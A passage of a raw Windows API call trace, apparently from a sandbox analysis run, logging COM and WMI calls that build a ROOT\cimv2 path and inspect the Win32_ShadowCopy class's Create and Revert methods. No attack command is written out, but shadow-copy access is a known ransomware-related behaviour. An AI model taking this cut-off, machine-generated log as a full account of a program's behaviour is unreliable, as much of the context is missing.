Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cae0 | out: ppv=0x1c64cae0*=0x212498) returned 0x0 [0109.544] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb00 | out: pAptType=0x1c64cb00*=1) returned 0x0 [0109.544] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc08 | out: ppvObject=0x1c64cc08*=0x0) returned 0x80004002 [0109.544] IUnknown:Release (This=0x212498) returned 0x1 [0109.544] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c170 | out: ppv=0x1c64c170*=0x1c8f1ba0) returned 0x0 [0109.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1ba0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64be80 | out: ppvObject=0x1c64be80*=0x0) returned 0x80004002 [0109.545] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1ba0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64be68 | out: ppvObject=0x1c64be68*=0x1c8f9030) returned 0x0 [0109.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f9030, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bd70 | out: ppvObject=0x1c64bd70*=0x1c8f9030) returned 0x0 [0109.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f9030, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64bdf0 | out: ppvObject=0x1c64bdf0*=0x0) returned 0x80004002 [0109.545] WbemDefPath:IUnknown:AddRef (This=0x1c8f9030) returned 0x3 [0109.545] CoGetContextToken (in: pToken=0x1c64ba40 | out: pToken=0x1c64ba40) returned 0x0 [0109.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f9030, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba00 | out: ppvObject=0x1c64ba00*=0x1b785c90) returned 0x0 [0109.545] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b785c90, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64ba30 | out: pCid=0x1c64ba30*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.545] WbemDefPath:IUnknown:Release (This=0x1b785c90) returned 0x3 [0109.545] CoGetContextToken (in: pToken=0x1c64ba10 | out: pToken=0x1c64ba10) returned 0x0 [0109.545] WbemDefPath:IUnknown:AddRef (This=0x1c8f9030) returned 0x4 [0109.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f9030, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bb28 | out: ppvObject=0x1c64bb28*=0x0) returned 0x80004002 [0109.545] WbemDefPath:IUnknown:Release (This=0x1c8f9030) returned 0x3 [0109.545] WbemDefPath:IUnknown:Release (This=0x1c8f9030) returned 0x2 [0109.546] WbemDefPath:IUnknown:Release (This=0x1c8f1ba0) returned 0x0 [0109.546] WbemDefPath:IUnknown:Release (This=0x1c8f9030) returned 0x1 [0109.546] CoGetContextToken (in: pToken=0x1c64c740 | out: pToken=0x1c64c740) returned 0x0 [0109.546] CoGetContextToken (in: pToken=0x1c64c680 | out: pToken=0x1c64c680) returned 0x0 [0109.546] WbemDefPath:IUnknown:AddRef (This=0x1c8f9030) returned 0x2 [0109.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f9030, riid=0x1c64c7c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c7a0 | out: ppvObject=0x1c64c7a0*=0x1c8f9030) returned 0x0 [0109.546] WbemDefPath:IUnknown:Release (This=0x1c8f9030) returned 0x2 [0109.546] WbemDefPath:IUnknown:Release (This=0x1c8f9030) returned 0x1 [0109.546] CoGetContextToken (in: pToken=0x1c64c8c0 | out: pToken=0x1c64c8c0) returned 0x0 [0109.546] CoGetContextToken (in: pToken=0x1c64c800 | out: pToken=0x1c64c800) returned 0x0 [0109.546] WbemDefPath:IUnknown:AddRef (This=0x1c8f9030) returned 0x2 [0109.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f9030, riid=0x1c64c940*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c920 | out: ppvObject=0x1c64c920*=0x1c8f9030) returned 0x0 [0109.546] WbemDefPath:IUnknown:Release (This=0x1c8f9030) returned 0x2 [0109.546] WbemDefPath:IUnknown:AddRef (This=0x1c8f9030) returned 0x3 [0109.546] WbemDefPath:IWbemPath:SetText (This=0x1c8f9030, uMode=0x4, pszPath="") returned 0x0 [0109.546] WbemDefPath:IUnknown:Release (This=0x1c8f9030) returned 0x2 [0109.546] CoGetObjectContext (in: riid=0x1c64cae8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cae0 | out: ppv=0x1c64cae0*=0x212498) returned 0x0 [0109.546] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb00 | out: pAptType=0x1c64cb00*=1) returned 0x0 [0109.546] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc08 | out: ppvObject=0x1c64cc08*=0x0) returned 0x80004002 [0109.547] IUnknown:Release (This=0x212498) returned 0x1 [0109.547] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c170 | out: ppv=0x1c64c170*=0x1c8f1ba0) returned 0x0 [0109.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1ba0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64be80 | out: ppvObject=0x1c64be80*=0x0) returned 0x80004002 [0109.547] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1ba0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64be68 | out: ppvObject=0x1c64be68*=0x1c8f90f0) returned 0x0 [0109.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f90f0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bd70 | out: ppvObject=0x1c64bd70*=0x1c8f90f0) returned 0x0 [0109.548] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f90f0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64bdf0 | out: ppvObject=0x1c64bdf0*=0x0) returned 0x80004002 [0109.548] WbemDefPath:IUnknown:AddRef (This=0x1c8f90f0) returned 0x3 [0109.548] CoGetContextToken (in: pToken=0x1c64ba40 | out: pToken=0x1c64ba40) returned 0x0 [0109.548] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f90f0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba00 | out: ppvObject=0x1c64ba00*=0x1b785cd0) returned 0x0 [0109.548] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b785cd0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64ba30 | out: pCid=0x1c64ba30*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.548] WbemDefPath:IUnknown:Release (This=0x1b785cd0) returned 0x3 [0109.548] CoGetContextToken (in: pToken=0x1c64ba10 | out: pToken=0x1c64ba10) returned 0x0 [0109.548] WbemDefPath:IUnknown:AddRef (This=0x1c8f90f0) returned 0x4 [0109.548] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f90f0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bb28 | out: ppvObject=0x1c64bb28*=0x0) returned 0x80004002 [0109.548] WbemDefPath:IUnknown:Release (This=0x1c8f90f0) returned 0x3 [0109.548] WbemDefPath:IUnknown:Release (This=0x1c8f90f0) returned 0x2 [0109.548] WbemDefPath:IUnknown:Release (This=0x1c8f1ba0) returned 0x0 [0109.548] WbemDefPath:IUnknown:Release (This=0x1c8f90f0) returned 0x1 [0109.548] CoGetContextToken (in: pToken=0x1c64c740 | out: pToken=0x1c64c740) returned 0x0 [0109.548] CoGetContextToken (in: pToken=0x1c64c680 | out: pToken=0x1c64c680) returned 0x0 [0109.548] WbemDefPath:IUnknown:AddRef (This=0x1c8f90f0) returned 0x2 [0109.549] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f90f0, riid=0x1c64c7c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c7a0 | out: ppvObject=0x1c64c7a0*=0x1c8f90f0) returned 0x0 [0109.549] WbemDefPath:IUnknown:Release (This=0x1c8f90f0) returned 0x2 [0109.549] WbemDefPath:IUnknown:Release (This=0x1c8f90f0) returned 0x1 [0109.549] CoGetContextToken (in: pToken=0x1c64c8c0 | out: pToken=0x1c64c8c0) returned 0x0 [0109.549] CoGetContextToken (in: pToken=0x1c64c800 | out: pToken=0x1c64c800) returned 0x0 [0109.549] WbemDefPath:IUnknown:AddRef (This=0x1c8f90f0) returned 0x2 [0109.549] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f90f0, riid=0x1c64c940*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c920 | out: ppvObject=0x1c64c920*=0x1c8f90f0) returned 0x0 [0109.549] WbemDefPath:IUnknown:Release (This=0x1c8f90f0) returned 0x2 [0109.549] WbemDefPath:IUnknown:AddRef (This=0x1c8f90f0) returned 0x3 [0109.549] WbemDefPath:IWbemPath:SetText (This=0x1c8f90f0, uMode=0x4, pszPath="") returned 0x0 [0109.549] WbemDefPath:IUnknown:Release (This=0x1c8f90f0) returned 0x2 [0109.549] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f90f0, puCount=0x1c64cbe0 | out: puCount=0x1c64cbe0*=0x0) returned 0x0 [0109.549] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f9030, puCount=0x1c64cbe0 | out: puCount=0x1c64cbe0*=0x0) returned 0x0 [0109.549] WbemDefPath:IWbemPath:GetClassName (in: This=0x1c8f90f0, puBuffLength=0x1c64cc80*=0x0, pszName=0x0 | out: puBuffLength=0x1c64cc80*=0x0, pszName=0x0) returned 0x8004103a [0109.549] WbemDefPath:IWbemPath:GetServer (in: This=0x1c8f90f0, puNameBufLength=0x1c64cc80*=0x0, pName=0x0 | out: puNameBufLength=0x1c64cc80*=0x0, pName=0x0) returned 0x80041009 [0109.549] WbemDefPath:IWbemPath:SetServer (This=0x1c8f90f0, Name="XDUWTFONO") returned 0x0 [0109.549] CoGetObjectContext (in: riid=0x1c64cae8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cae0 | out: ppv=0x1c64cae0*=0x212498) returned 0x0 [0109.549] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb00 | out: pAptType=0x1c64cb00*=1) returned 0x0 [0109.549] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc08 | out: ppvObject=0x1c64cc08*=0x0) returned 0x80004002 [0109.550] IUnknown:Release (This=0x212498) returned 0x1 [0109.550] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c170 | out: ppv=0x1c64c170*=0x1c8f1bc0) returned 0x0 [0109.550] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1bc0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64be80 | out: ppvObject=0x1c64be80*=0x0) returned 0x80004002 [0109.550] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f1bc0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64be68 | out: ppvObject=0x1c64be68*=0x1c8f91b0) returned 0x0 [0109.550] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f91b0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bd70 | out: ppvObject=0x1c64bd70*=0x1c8f91b0) returned 0x0 [0109.550] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f91b0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64bdf0 | out: ppvObject=0x1c64bdf0*=0x0) returned 0x80004002 [0109.550] WbemDefPath:IUnknown:AddRef (This=0x1c8f91b0) returned 0x3 [0109.551] CoGetContextToken (in: pToken=0x1c64ba40 | out: pToken=0x1c64ba40) returned 0x0 [0109.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f91b0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba00 | out: ppvObject=0x1c64ba00*=0x1b785d10) returned 0x0 [0109.551] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b785d10, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64ba30 | out: pCid=0x1c64ba30*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.551] WbemDefPath:IUnknown:Release (This=0x1b785d10) returned 0x3 [0109.551] CoGetContextToken (in: pToken=0x1c64ba10 | out: pToken=0x1c64ba10) returned 0x0 [0109.551] WbemDefPath:IUnknown:AddRef (This=0x1c8f91b0) returned 0x4 [0109.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f91b0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bb28 | out: ppvObject=0x1c64bb28*=0x0) returned 0x80004002 [0109.551] WbemDefPath:IUnknown:Release (This=0x1c8f91b0) returned 0x3 [0109.551] WbemDefPath:IUnknown:Release (This=0x1c8f91b0) returned 0x2 [0109.551] WbemDefPath:IUnknown:Release (This=0x1c8f1bc0) returned 0x0 [0109.551] WbemDefPath:IUnknown:Release (This=0x1c8f91b0) returned 0x1 [0109.551] CoGetContextToken (in: pToken=0x1c64c740 | out: pToken=0x1c64c740) returned 0x0 [0109.551] CoGetContextToken (in: pToken=0x1c64c680 | out: pToken=0x1c64c680) returned 0x0 [0109.551] WbemDefPath:IUnknown:AddRef (This=0x1c8f91b0) returned 0x2 [0109.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f91b0, riid=0x1c64c7c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c7a0 | out: ppvObject=0x1c64c7a0*=0x1c8f91b0) returned 0x0 [0109.551] WbemDefPath:IUnknown:Release (This=0x1c8f91b0) returned 0x2 [0109.551] WbemDefPath:IUnknown:Release (This=0x1c8f91b0) returned 0x1 [0109.551] CoGetContextToken (in: pToken=0x1c64c8c0 | out: pToken=0x1c64c8c0) returned 0x0 [0109.551] CoGetContextToken (in: pToken=0x1c64c800 | out: pToken=0x1c64c800) returned 0x0 [0109.551] WbemDefPath:IUnknown:AddRef (This=0x1c8f91b0) returned 0x2 [0109.551] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f91b0, riid=0x1c64c940*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c920 | out: ppvObject=0x1c64c920*=0x1c8f91b0) returned 0x0 [0109.552] WbemDefPath:IUnknown:Release (This=0x1c8f91b0) returned 0x2 [0109.552] WbemDefPath:IUnknown:AddRef (This=0x1c8f91b0) returned 0x3 [0109.552] WbemDefPath:IWbemPath:SetText (This=0x1c8f91b0, uMode=0x4, pszPath="ROOT\\cimv2") returned 0x0 [0109.552] WbemDefPath:IUnknown:Release (This=0x1c8f91b0) returned 0x2 [0109.552] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f90f0, puCount=0x1c64cbe0 | out: puCount=0x1c64cbe0*=0x0) returned 0x0 [0109.552] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f91b0, puCount=0x1c64cbe0 | out: puCount=0x1c64cbe0*=0x2) returned 0x0 [0109.552] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f91b0, lFlags=16, puBuffLength=0x1c64cbe0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cbe0*=0xb, pszText=0x0) returned 0x0 [0109.552] WbemDefPath:IWbemPath:GetText (in: This=0x1c8f91b0, lFlags=16, puBuffLength=0x1c64cbe0*=0xb, pszText="0000000000" | out: puBuffLength=0x1c64cbe0*=0xb, pszText="ROOT\\cimv2") returned 0x0 [0109.552] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x1c8f90f0) returned 0x0 [0109.552] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f91b0, puCount=0x1c64cc40 | out: puCount=0x1c64cc40*=0x2) returned 0x0 [0109.552] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f91b0, uIndex=0x0, puNameBufLength=0x1c64cc40*=0x0, pName=0x0 | out: puNameBufLength=0x1c64cc40*=0x5, pName=0x0) returned 0x0 [0109.552] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f91b0, uIndex=0x0, puNameBufLength=0x1c64cc40*=0x5, pName="0000" | out: puNameBufLength=0x1c64cc40*=0x5, pName="ROOT") returned 0x0 [0109.552] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1c8f90f0, uIndex=0x0, pszName="ROOT") returned 0x0 [0109.552] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f91b0, uIndex=0x1, puNameBufLength=0x1c64cc40*=0x0, pName=0x0 | out: puNameBufLength=0x1c64cc40*=0x6, pName=0x0) returned 0x0 [0109.552] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1c8f91b0, uIndex=0x1, puNameBufLength=0x1c64cc40*=0x6, pName="00000" | out: puNameBufLength=0x1c64cc40*=0x6, pName="cimv2") returned 0x0 [0109.552] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1c8f90f0, uIndex=0x1, pszName="cimv2") returned 0x0 [0109.552] WbemDefPath:IWbemPath:GetClassName (in: This=0x1c8f90f0, puBuffLength=0x1c64cc80*=0x0, pszName=0x0 | out: puBuffLength=0x1c64cc80*=0x0, pszName=0x0) returned 0x8004103a [0109.552] WbemDefPath:IWbemPath:SetClassName (This=0x1c8f90f0, Name="Win32_ShadowCopy") returned 0x0 [0109.552] IWbemClassObject:BeginMethodEnumeration (This=0x1c8f5460, lEnumFlags=0) returned 0x0 [0109.552] IWbemClassObject:NextMethod (in: This=0x1c8f5460, lFlags=0, pstrName=0x1c64cc18*=0x0, ppInSignature=0x1c64cc10*=0x0, ppOutSignature=0x1c64cc08*=0x0 | out: pstrName=0x1c64cc18*="Create", ppInSignature=0x1c64cc10*=0x1c8fc0e0, ppOutSignature=0x1c64cc08*=0x1c8fc750) returned 0x0 [0109.553] SysStringLen (param_1="Create") returned 0x6 [0109.553] IWbemClassObject:NextMethod (in: This=0x1c8f5460, lFlags=0, pstrName=0x1c64cc18*=0x0, ppInSignature=0x1c64cc10*=0x0, ppOutSignature=0x1c64cc08*=0x0 | out: pstrName=0x1c64cc18*="Revert", ppInSignature=0x1c64cc10*=0x1c8fcac0, ppOutSignature=0x1c64cc08*=0x1c8fcfd0) returned 0x0 [0109.553] SysStringLen (param_1="Revert") returned 0x6 [0109.553] IWbemClassObject:NextMethod (in: This=0x1c8f5460, lFlags=0, pstrName=0x1c64cc18*=0x0, ppInSignature=0x1c64cc10*=0x0, ppOutSignature=0x1c64cc08*=0x0 | out: pstrName=0x1c64cc18*=0x0, ppInSignature=0x1c64cc10*=0x0, ppOutSignature=0x1c64cc08*=0x0) returned 0x40005 [0109.554] IWbemClassObject:EndMethodEnumeration (This=0x1c8f5460) returned 0x0 [0109.554] IWbemClassObject:GetMethod (in: This=0x1c8f5460, wszName="Create", lFlags=0, ppInSignature=0x1c64cc08, ppOutSignature=0x1c64cc00 | out: ppInSignature=0x1c64cc08*=0x1c8fd5e0, ppOutSignature=0x1c64cc00*=0x1c8fdc50) returned 0x0 [0109.554] IWbemClassObject:GetMethodQualifierSet (in: This=0x1c8f5460, wszMethod="Create", ppQualSet=0x1c64cc00 | out: ppQualSet=0x1c64cc00*=0x1c8f9730) returned 0x0 [0109.555] IWbemQualifierSet:Get (in: This=0x1c8f9730, wszName="static", lFlags=0, pVal=0x1c64cbc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cbb8*=0 | out: pVal=0x1c64cbc0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), plFlavor=0x1c64cbb8*=0) returned 0x0 [0109.555] IWbemClassObject:GetMethodQualifierSet (in: This=0x1c8f5460, wszMethod="Create", ppQualSet=0x1c64cc30 | out: ppQualSet=0x1c64cc30*=0x1c8fdfd0) returned 0x0 [0109.555] IWbemQualifierSet:Get (in: This=0x1c8fdfd0, wszName="static", lFlags=0, pVal=0x1c64cbf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cbe8*=0 | out: pVal=0x1c64cbf0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), plFlavor=0x1c64cbe8*=0) returned 0x0 [0109.556] IWbemClassObject:GetMethod (in: This=0x1c8f5460, wszName="Revert", lFlags=0, ppInSignature=0x1c64cc08, ppOutSignature=0x1c64cc00 | out: ppInSignature=0x1c64cc08*=0x1c8fe290, ppOutSignature=0x1c64cc00*=0x1c8fe790) returned 0x0 [0109.556] IWbemClassObject:GetMethodQualifierSet (in: This=0x1c8f5460, wszMethod="Revert", ppQualSet=0x1c64cc00 | out: ppQualSet=0x1c64cc00*=0x1c8feb00) returned 0x0 [0109.557] IWbemQualifierSet:Get (in: This=0x1c8feb00, wszName="static", lFlags=0, pVal=0x1c64cbc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cbb8*=0 | out: pVal=0x1c64cbc0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c64cbb8*=0) returned 0x80041002 [0109.557] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1c64cc08 | out: 